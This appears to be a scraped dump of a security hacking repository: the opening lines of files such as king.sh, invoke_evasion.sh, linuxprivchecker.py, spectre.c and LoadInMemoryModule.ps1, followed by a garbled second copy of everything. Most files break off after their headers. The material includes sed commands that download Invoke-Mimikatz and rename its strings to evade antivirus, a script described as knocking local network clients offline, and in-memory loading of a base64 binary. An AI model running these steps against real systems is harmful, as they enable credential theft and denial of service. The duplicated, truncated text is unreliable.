Joshua Harp JRandomSage

## google-dorks

"          _                      _          "
"   _     /||       .   .        ||\     _   "
"  ( }    \||D    '   '     '   C||/    { %  "
" | /\__,=_[_]   '  .   . '       [_]_=,__/\ |"
" |_\_  |----|                    |----|  _/_|"
" |  |/ |    |                    |    | \|  |"
" |  /_ |    |                    |    | _\  |"

	It is all fun and games until someone gets hacked!

## king.sh
#!/bin/bash

# king of the mountain - because sharing is for faceb00k
#  * networking fun for geeks in conferences and cafes
#  * find other clients on the local network
#  * see if they have any exposed files via http
#  * use nmap to attempt to knock them offline

# - OSX or Linux supported (nmap, wget required)
# - this script derived from manual steps I used to take

## disable_ddeauto.reg
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
 "DontUpdateLinks"=dword:00000001

## annotations.xml
<?xml version="1.0" encoding="UTF-8"?>
<Annotations start="0" num="171" total="171">
  <Annotation about="www.bussink.net/*" timestamp="0x0005d7bc4022b026" href="ChF3d3cuYnVzc2luay5uZXQvKhCm4IqBxPf1Ag">
    <Label name="_cse_turlh5vi4xc"/>
    <AdditionalData attribute="original_url" value="https://www.bussink.net/"/>
  </Annotation>
  <Annotation about="*.thedfirreport.com/*" timestamp="0x0005d76dd5f8679d" href="ChUqLnRoZWRmaXJyZXBvcnQuY29tLyoQnc_hr93t9QI">
    <Label name="_cse_turlh5vi4xc"/>
    <AdditionalData attribute="original_url" value="https://thedfirreport.com/"/>
  </Annotation>

## invoke_evasion.sh
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555

# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

## freshnikto.sh
#!/bin/bash

git clone https://github.com/sullo/nikto.git;
cat nikto/program/nikto.conf | grep -v 'USERAGENT\=' > nikto/program/nikto.conf.new;
echo -en '\nUSERAGENT=Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36' >> nikto/program/nikto.conf.new;
mv -f nikto/program/nikto.conf.new nikto/program/nikto.conf;

perl nikto/program/nikto.pl -Help

exit 0

## iptables.sh
#!/bin/bash
IPT="/sbin/iptables"

# Server IP
SERVER_IP="$(ip addr show eth0 | grep 'inet ' | cut -f2 | awk '{ print $2}')"

# Your DNS servers you use: cat /etc/resolv.conf
DNS_SERVER="8.8.4.4 8.8.8.8"

# Allow connections to this package servers

## linuxprivchecker.py
#!/usr/env python

###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.

## spectre.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

## LoadInMemoryModule.ps1
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA

	" _ _ "
	" _ /\|\| . . \|\|\ _ "
	" ( } \\|\|D ' ' ' C\|\|/ { % "
	" \| /\__,=_[_] ' . . ' [_]_=,__/\ \|"
	" \|_\_ \|----\| \|----\| _/_\|"
	" \| \|/ \| \| \| \| \\| \|"
	" \| /_ \| \| \| \| _\ \|"

	It is all fun and games until someone gets hacked!
	#!/bin/bash

	# king of the mountain - because sharing is for faceb00k
	# * networking fun for geeks in conferences and cafes
	# * find other clients on the local network
	# * see if they have any exposed files via http
	# * use nmap to attempt to knock them offline

	# - OSX or Linux supported (nmap, wget required)
	# - this script derived from manual steps I used to take
	Windows Registry Editor Version 5.00

	[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
	"DontUpdateLinks"=dword:00000001

	[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
	"DontUpdateLinks"=dword:00000001

	[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
	"DontUpdateLinks"=dword:00000001
	<?xml version="1.0" encoding="UTF-8"?>
	<Annotations start="0" num="171" total="171">
	<Annotation about="www.bussink.net/*" timestamp="0x0005d7bc4022b026" href="ChF3d3cuYnVzc2luay5uZXQvKhCm4IqBxPf1Ag">
	<Label name="_cse_turlh5vi4xc"/>
	<AdditionalData attribute="original_url" value="https://www.bussink.net/"/>
	</Annotation>
	<Annotation about=".thedfirreport.com/" timestamp="0x0005d76dd5f8679d" href="ChUqLnRoZWRmaXJyZXBvcnQuY29tLyoQnc_hr93t9QI">
	<Label name="_cse_turlh5vi4xc"/>
	<AdditionalData attribute="original_url" value="https://thedfirreport.com/"/>
	</Annotation>
	# AV Bypass to run Mimikatz
	# From: https://www.blackhillsinfosec.com/?p=5555

	# Server side:
	wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
	sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
	sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
	sed -i -e 's/^[[:space:]]#.$//g' Invoke-Mimikatz.ps1
	sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
	sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
	#!/bin/bash

	git clone https://github.com/sullo/nikto.git;
	cat nikto/program/nikto.conf \| grep -v 'USERAGENT\=' > nikto/program/nikto.conf.new;
	echo -en '\nUSERAGENT=Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36' >> nikto/program/nikto.conf.new;
	mv -f nikto/program/nikto.conf.new nikto/program/nikto.conf;

	perl nikto/program/nikto.pl -Help

	exit 0
	#!/bin/bash
	IPT="/sbin/iptables"

	# Server IP
	SERVER_IP="$(ip addr show eth0 \| grep 'inet ' \| cut -f2 \| awk '{ print $2}')"

	# Your DNS servers you use: cat /etc/resolv.conf
	DNS_SERVER="8.8.4.4 8.8.8.8"

	# Allow connections to this package servers
	#!/usr/env python

	###############################################################################################################
	## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
	## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
	##-------------------------------------------------------------------------------------------------------------
	## [Details]:
	## This script is intended to be executed locally on a Linux box to enumerate basic system info and
	## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
	## passwords and applicable exploits.
	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>
	#ifdef _MSC_VER
	#include <intrin.h> /* for rdtscp and clflush */
	#pragma optimize("gt",on)
	#else
	#include <x86intrin.h> /* for rdtscp and clflush */
	#endif
	$Domain = [AppDomain]::CurrentDomain
	$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
	$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
	$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
	# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
	$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
	$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
	$TypeBuilder.CreateType()
	$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA